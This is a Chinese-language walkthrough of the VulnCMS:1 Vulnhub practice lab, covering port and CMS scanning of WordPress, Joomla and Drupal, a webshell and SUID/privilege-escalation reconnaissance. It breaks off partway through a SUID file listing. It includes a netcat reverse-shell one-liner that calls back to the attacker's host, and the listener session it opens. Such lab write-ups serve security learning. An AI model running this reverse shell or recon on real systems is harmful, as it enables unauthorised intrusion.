【Vulnhub 靶场】【VulnCMS: 1】【简单】【20210613】

news2024/11/15 17:26:59

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/vulncms-1,710/
靶场下载:https://download.vulnhub.com/vulncms/VulnCMS.ova
靶场难度:简单
发布日期:2021年06月13日
文件大小:1.4 GB
靶场作者:tombstoneGhost (Simardeep Singh)
靶场系列:VulnCMS
靶场描述

  • 正如它的名字所暗示的,这个盒子是关于CMS的。你需要枚举盒子,找到CMS,并利用它来访问其他人,最终获得用户和根标志。
  • 提示:按照给定的顺序进行:P

打靶耗时:2+小时,目录扫描花费了大量时间,然后就是关键的 Linux 信息搜索。
打靶关键

  1. Web 目录扫描
  2. Linux 信息收集
  3. SUDO 提权

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:66       (Unknown: locally administered)
192.168.56.36   08:00:27:3c:22:7a       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.027 seconds (126.30 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-19 02:50 EST
Nmap scan report for 192.168.56.36
Host is up (0.00061s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8c:9f:7e:78:82:ef:76:f6:26:23:c9:52:6d:aa:fe:d0 (RSA)
|   256 2a:e2:f6:d2:52:1c:c1:d0:3d:aa:40:e6:b5:08:1d:45 (ECDSA)
|_  256 fa:c9:eb:58:e3:d2:b7:4a:74:77:fc:69:0e:b6:68:08 (ED25519)
80/tcp   open  http    nginx 1.14.0 (Ubuntu)
|_http-title: W3.CSS Template
|_http-server-header: nginx/1.14.0 (Ubuntu)
5000/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: fsociety – Just another WordPress site
|_http-generator: WordPress 5.7.2
|_http-server-header: nginx/1.14.0 (Ubuntu)
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Home
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
9001/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: fsociety.web
|_http-server-header: nginx/1.14.0 (Ubuntu)
MAC Address: 08:00:27:3C:22:7A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.56.36

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.44 seconds
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p- 192.168.56.36           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-19 03:16 EST
Nmap scan report for 192.168.56.36
Host is up (0.0013s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn·t find any DOM based XSS.
| http-enum: 
|   /home.html: Possible admin folder
|_  /robots.txt: Robots file
|_http-stored-xss: Couldn·t find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://www.securityfocus.com/bid/49303
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.tenable.com/plugins/nessus/55976
5000/tcp open  upnp
8081/tcp open  blackice-icecap
9001/tcp open  tor-orport
|_ssl-ccs-injection: No reply from server (TIMEOUT)
MAC Address: 08:00:27:3C:22:7A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 93.87 seconds

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 根据失败请求,添加「hosts」

在这里插入图片描述
在这里插入图片描述

3、CMS

在这里插入图片描述

3.1、80端口 - CMS扫描、目录扫描

  • http://192.168.56.36/index.html
  • http://192.168.56.36/robots.txt
  • http://192.168.56.36/about.html
  • http://192.168.56.36/home.html
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# whatweb -v http://192.168.56.36/    
WhatWeb report for http://192.168.56.36/
Status    : 200 OK
Title     : W3.CSS Template
IP        : 192.168.56.36
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], nginx[1.14.0]

Detected Plugins:
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : nginx/1.14.0 (Ubuntu) (from server string)

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance 
        HTTP server and reverse proxy, as well as an IMAP/POP3 
        proxy server. 

        Version      : 1.14.0
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.14.0 (Ubuntu)
        Date: Sun, 19 Nov 2023 09:17:01 GMT
        Content-Type: text/html
        Last-Modified: Wed, 26 May 2021 08:41:11 GMT
        Transfer-Encoding: chunked
        Connection: close
        ETag: W/"60ae09a7-17a9"
        Content-Encoding: gzip

在这里插入图片描述
在这里插入图片描述

3.2、5000端口 - CMS扫描

  • http://192.168.56.36:5000/engine/classes/swfupload/swfupload.swf
  • http://192.168.56.36:5000/engine/classes/swfupload/swfupload_f9.swf
  • http://192.168.56.36:5000/extjs/resources/charts.swf
  • http://192.168.56.36:5000/html/js/misc/swfupload/swfupload.swf
  • http://192.168.56.36:5000/license.txt
  • http://192.168.56.36:5000/phpmyadmin
  • http://192.168.56.36:5000/readme.html
  • http://192.168.56.36:5000/wp-content/plugins/akismet/akismet.php
  • http://192.168.56.36:5000/wp-login.php
  • http://192.168.56.36:5000/atom
  • http://192.168.56.36:5000/feed
  • http://192.168.56.36:5000/login/
  • http://192.168.56.36:5000/jkstatus
  • http://192.168.56.36:5000/rss
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# whatweb -v http://192.168.56.36:5000/
WhatWeb report for http://192.168.56.36:5000/
Status    : 200 OK
Title     : fsociety – Just another WordPress site
IP        : 192.168.56.36
Country   : RESERVED, ZZ

Summary   : HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], MetaGenerator[WordPress 5.7.2], nginx[1.14.0], PoweredBy[--], Script, UncommonHeaders[link], WordPress[5.7.2]

Detected Plugins:
[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : nginx/1.14.0 (Ubuntu) (from server string)

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its 
        value. 

        String       : WordPress 5.7.2

[ PoweredBy ]
        This plugin identifies instances of 'Powered by x' text and 
        attempts to extract the value for x. 

        String       : --

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : link (from headers)

[ WordPress ]
        WordPress is an opensource blogging system commonly used as 
        a CMS. 

        Version      : 5.7.2
        Aggressive function available (check plugin file or details).
        Google Dorks: (1)
        Website     : http://www.wordpress.org/

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance 
        HTTP server and reverse proxy, as well as an IMAP/POP3 
        proxy server. 

        Version      : 1.14.0
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.14.0 (Ubuntu)
        Date: Sun, 19 Nov 2023 09:21:41 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Link: <http://fsociety.web:5000/wp-json/>; rel="https://api.w.org/"
        Content-Encoding: gzip
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cmseek -u http://192.168.56.36:5000/

___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  CMS Detection And Deep Scan  [+] 

[i] Scanning Site: http://192.168.56.36:5000/
[*] CMS Detected, CMS ID: wp, Detection method: header
[*] Version Detected, WordPress Version 5.7.2
[*] Path disclosure detected, path: var/www/html/wordpress/public_html/
[i] Checking user registration status
[i] Starting passive plugin enumeration
[x] No plugins enumerated!
[i] Starting passive theme enumeration
[*] 1 theme detected!
[i] Starting Username Harvest
[i] Harvesting usernames from wp-json api
[*] Found user from wp-json : wordpress_admin
[i] Harvesting usernames from jetpack public api
[!] No results from jetpack api... maybe the site doesn't use jetpack
[i] Harvesting usernames from wordpress author Parameter
[*] Found user from source code: wordpress_admin
[*] 1 Usernames was enumerated
[i] Checking version vulnerabilities using wpvulns.com
[x] Error Retriving data from wpvulndb

 ___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  Deep Scan Results  [+] 

 ┏━Target: 192.168.56.36:5000
 ┃
 ┠── CMS: WordPress
 ┃    │
 ┃    ├── Version: 5.7.2
 ┃    ╰── URL: https://wordpress.org
 ┃
 ┠──[WordPress Deepscan]
 ┃    │
 ┃    ├── Readme file found: http://192.168.56.36:5000//readme.html
 ┃    ├── License file: http://192.168.56.36:5000//license.txt
 ┃    ├── Path disclosure: var/www/html/wordpress/public_html/
 ┃    │
 ┃    ├── Themes Enumerated: 1
 ┃    │    │
 ┃    │    ╰── Theme: twentytwentyone
 ┃    │        │
 ┃    │        ├── Version: 1.3
 ┃    │        ╰── URL: http://192.168.56.36:5000//wp-content/themes/twentytwentyone
 ┃    │
 ┃    │
 ┃    ├── Usernames harvested: 1
 ┃    │    ╰── wordpress_admin
 ┃    │
 ┃
 ┠── Result: /usr/share/cmseek/Result/192.168.56.36_5000/cms.json
 ┃
 ┗━Scan Completed in 3.46 Seconds, using 42 Requests

 CMSeeK says ~ adios
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# wpscan --url=http://192.168.56.36:5000/ --ignore-main-redirect --force -e --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | ·_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.36:5000/ [192.168.56.36]
[+] Started: Sun Nov 19 04:04:21 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.0 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.36:5000/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.36:5000/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.36:5000/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.36:5000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.36:5000/, Match: 'WordPress 5.7.2'

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:01:37 <===================================> (6539 / 6539) 100.00% Time: 00:01:37
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:09 <=====================================> (624 / 624) 100.00% Time: 00:00:09

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:11 <===================================> (2568 / 2568) 100.00% Time: 00:00:11

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <======================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:01 <============================================> (71 / 71) 100.00% Time: 00:00:01

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <=================================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] wordpress_admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.56.36:5000/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 19 04:06:31 2023
[+] Requests Done: 10088
[+] Cached Requests: 4
[+] Data Sent: 2.824 MB
[+] Data Received: 2.947 MB
[+] Memory used: 265.102 MB
[+] Elapsed time: 00:02:10
  • 存在WebShell后面

在这里插入图片描述
在这里插入图片描述

3.3、8081端口 - CMS扫描

  • http://192.168.56.36:8081/index.php
  • http://192.168.56.36:8081/robots.txt
  • http://192.168.56.36:8081/configuration.php
  • http://192.168.56.36:8081/htaccess.txt
  • http://192.168.56.36:8081/LICENSE.txt
  • http://192.168.56.36:8081/README.txt
  • http://192.168.56.36:8081/web.config.txt
  • http://192.168.56.36:8081/administrator/
  • http://192.168.56.36:8081/bin/
  • http://192.168.56.36:8081/cache/
  • http://192.168.56.36:8081/components/
  • http://192.168.56.36:8081/images/
  • http://192.168.56.36:8081/includes/
  • http://192.168.56.36:8081/language/
  • http://192.168.56.36:8081/layouts/
  • http://192.168.56.36:8081/libraries/
  • http://192.168.56.36:8081/logs/
  • http://192.168.56.36:8081/media/
  • http://192.168.56.36:8081/modules/
  • http://192.168.56.36:8081/plugins/
  • http://192.168.56.36:8081/templates/
  • http://192.168.56.36:8081/tmp/
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# whatweb -v http://192.168.56.36:8081/
WhatWeb report for http://192.168.56.36:8081/
Status    : 200 OK
Title     : Home
IP        : 192.168.56.36
Country   : RESERVED, ZZ

Summary   : Bootstrap, Cookies[a5845a875e8923f18089c05b8adc2b9c], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], HttpOnly[a5845a875e8923f18089c05b8adc2b9c], JQuery, MetaGenerator[Joomla! - Open Source Content Management], nginx[1.14.0], PasswordField[password], Script[text/javascript]

Detected Plugins:
[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with 
        HTML, CSS, and JS. 

        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The 
        values are not returned to save on space. 

        String       : a5845a875e8923f18089c05b8adc2b9c

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : nginx/1.14.0 (Ubuntu) (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie 
        response header and the browser supports it then the cookie 
        cannot be accessed through client side script - More Info: 
        http://en.wikipedia.org/wiki/HTTP_cookie 

        String       : a5845a875e8923f18089c05b8adc2b9c

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its 
        value. 

        String       : Joomla! - Open Source Content Management

[ PasswordField ]
        find password fields 

        String       : password (from field name)

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

        String       : text/javascript

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance 
        HTTP server and reverse proxy, as well as an IMAP/POP3 
        proxy server. 

        Version      : 1.14.0
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.14.0 (Ubuntu)
        Date: Sun, 19 Nov 2023 09:22:25 GMT
        Content-Type: text/html; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: a5845a875e8923f18089c05b8adc2b9c=q5beligvsf2itdopiqhbrp37j0; path=/; HttpOnly
        Expires: Mon, 1 Jan 2001 00:00:00 GMT
        Last-Modified: Sun, 19 Nov 2023 09:22:25 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Content-Encoding: gzip
  • 存在可利用漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.4、9001端口 - CMS扫描

  • http://192.168.56.36:9001/index.php
  • http://192.168.56.36:9001/web.config
  • http://192.168.56.36:9001/xmlrpc.php
  • http://192.168.56.36:9001/.editorconfig
  • http://192.168.56.36:9001/.gitignore
  • http://192.168.56.36:9001/CHANGELOG.txt
  • http://192.168.56.36:9001/COPYRIGHT.txt
  • http://192.168.56.36:9001/INSTALL.pgsql.txt
  • http://192.168.56.36:9001/install.php?profile=default
  • http://192.168.56.36:9001/INSTALL.mysql.txt
  • http://192.168.56.36:9001/install.php
  • http://192.168.56.36:9001/INSTALL.txt
  • http://192.168.56.36:9001/LICENSE.txt
  • http://192.168.56.36:9001/includes/bootstrap.inc
  • http://192.168.56.36:9001/MAINTAINERS.txt
  • http://192.168.56.36:9001/profiles/testing/testing.info
  • http://192.168.56.36:9001/profiles/minimal/minimal.info
  • http://192.168.56.36:9001/profiles/standard/standard.info
  • http://192.168.56.36:9001/README.txt
  • http://192.168.56.36:9001/sites/example.sites.php
  • http://192.168.56.36:9001/sites/README.txt
  • http://192.168.56.36:9001/sites/all/themes/README.txt
  • http://192.168.56.36:9001/sites/all/libraries/README.txt
  • http://192.168.56.36:9001/sites/all/modules/README.txt
  • http://192.168.56.36:9001/UPGRADE.txt
  • http://192.168.56.36:9001/includes/
  • http://192.168.56.36:9001/misc/
  • http://192.168.56.36:9001/modules/
  • http://192.168.56.36:9001/profiles/
  • http://192.168.56.36:9001/scripts/
  • http://192.168.56.36:9001/sites/
  • http://192.168.56.36:9001/themes/
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# whatweb -v http://192.168.56.36:9001/
WhatWeb report for http://192.168.56.36:9001/
Status    : 200 OK
Title     : fsociety.web
IP        : 192.168.56.36
Country   : RESERVED, ZZ

Summary   : Content-Language[en], Drupal, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], nginx[1.14.0], PasswordField[pass], Script[text/javascript], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN]

Detected Plugins:
[ Content-Language ]
        Detect the content-language setting from the HTTP header. 

        String       : en

[ Drupal ]
        Drupal is an opensource CMS written in PHP. 

        Aggressive function available (check plugin file or details).
        Google Dorks: (1)
        Website     : http://www.drupal.org

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : nginx/1.14.0 (Ubuntu) (from server string)

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse 
        HTML documents, handle events, perform animations, and add 
        AJAX. 

        Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its 
        value. 

        String       : Drupal 7 (http://drupal.org)

[ PasswordField ]
        find password fields 

        String       : pass (from field name)

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 

        String       : text/javascript

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all 
        the standard headers and many non standard but common ones. 
        Interesting but fairly common headers should have their own 
        plugins, eg. x-powered-by, server and x-aspnet-version. 
        Info about headers can be found at www.http-stats.com 

        String       : x-content-type-options,x-generator (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the 
        HTTP header. - More Info: 
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance 
        HTTP server and reverse proxy, as well as an IMAP/POP3 
        proxy server. 

        Version      : 1.14.0
        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx/1.14.0 (Ubuntu)
        Date: Sun, 19 Nov 2023 09:22:59 GMT
        Content-Type: text/html; charset=utf-8
        Transfer-Encoding: chunked
        Connection: close
        Expires: Sun, 19 Nov 1978 05:00:00 GMT
        Cache-Control: no-cache, must-revalidate
        X-Content-Type-Options: nosniff
        Content-Language: en
        X-Frame-Options: SAMEORIGIN
        X-Generator: Drupal 7 (http://drupal.org)
        Content-Encoding: gzip
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cmseek -u http://192.168.56.36:9001/

___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  CMS Detection And Deep Scan  [+] 

[i] Scanning Site: http://192.168.56.36:9001/
[*] CMS Detected, CMS ID: dru, Detection method: header
[*] Starting version detection
[*] Drupal version 7 detected

 ___ _  _ ____ ____ ____ _  _
|    |\/| [__  |___ |___ |_/  by @r3dhax0r
|___ |  | ___| |___ |___ | \_ Version 1.1.3 K-RONA

 [+]  CMS Scan Results  [+] 

 ┏━Target: 192.168.56.36:9001
 ┃
 ┠── CMS: Drupal
 ┃    │
 ┃    ├── Version: 7
 ┃    ╰── URL: https://drupal.org
 ┃
 ┠── Result: /usr/share/cmseek/Result/192.168.56.36_9001/cms.json
 ┃
 ┗━Scan Completed in 0.11 Seconds, using 1 Requests

 CMSeeK says ~ au revoir
  • 存在可利用漏洞

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、WebShell 利用

在这里插入图片描述

4.1、反弹连接

  • 尝试了多条反弹链接,下面这条可以
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.3 10086 >/tmp/f

在这里插入图片描述

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 10086
listening on [any] 10086 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.36] 39184
/bin/sh: 0: can't access tty; job control turned off
$ SHELL=/bin/bash script -q /dev/null
www-data@vuln_cms:~/html/wordpress/public_html$

5、信息收集

5.1、基础信息收集

www-data@vuln_cms:~$ history
history
    1  history
www-data@vuln_cms:~$ sudo -l
sudo -l
[sudo] password for www-data: 
Sorry, try again.
[sudo] password for www-data: 
Sorry, try again.
[sudo] password for www-data: 
sudo: 3 incorrect password attempts
www-data@vuln_cms:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
www-data@vuln_cms:~$ crontab -l
crontab -l
no crontab for www-data
www-data@vuln_cms:~$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@vuln_cms:~$ hostnamectl
hostnamectl
   Static hostname: vuln_cms
         Icon name: computer-vm
           Chassis: vm
        Machine ID: d68409f855184a36a84c313199619e66
           Boot ID: ddb7a726e0b24946af7b91bd963c3ad4
    Virtualization: oracle
  Operating System: Ubuntu 18.04.5 LTS
            Kernel: Linux 4.15.0-143-generic
      Architecture: x86-64
www-data@vuln_cms:~$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@vuln_cms:~$ echo $BASH_VERSION
echo $BASH_VERSION
4.4.20(1)-release
www-data@vuln_cms:~$ cat /proc/1/cgroup
cat /proc/1/cgroup
12:devices:/
11:freezer:/
10:blkio:/
9:rdma:/
8:perf_event:/
7:pids:/
6:cpuset:/
5:hugetlb:/
4:net_cls,net_prio:/
3:cpu,cpuacct:/
2:memory:/
1:name=systemd:/init.scope
0::/init.scope
www-data@vuln_cms:~$ ifconfig
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.36  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::a00:27ff:fe3c:227a  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:3c:22:7a  txqueuelen 1000  (Ethernet)
        RX packets 637792  bytes 100923571 (100.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 567348  bytes 302769095 (302.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 43920  bytes 3118296 (3.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 43920  bytes 3118296 (3.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • 存在可利用漏洞

在这里插入图片描述

5.2、文件信息收集

  • 存在可利用漏洞:polkit-agent-helper-1
www-data@vuln_cms:~$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/bin/mount
/bin/fusermount
/bin/su
/bin/umount
/bin/ping
/usr/sbin/pppd
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/arping
/usr/bin/gpasswd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@vuln_cms:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/su
/bin/umount
/bin/ping
/usr/sbin/pppd
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/at
/usr/bin/passwd
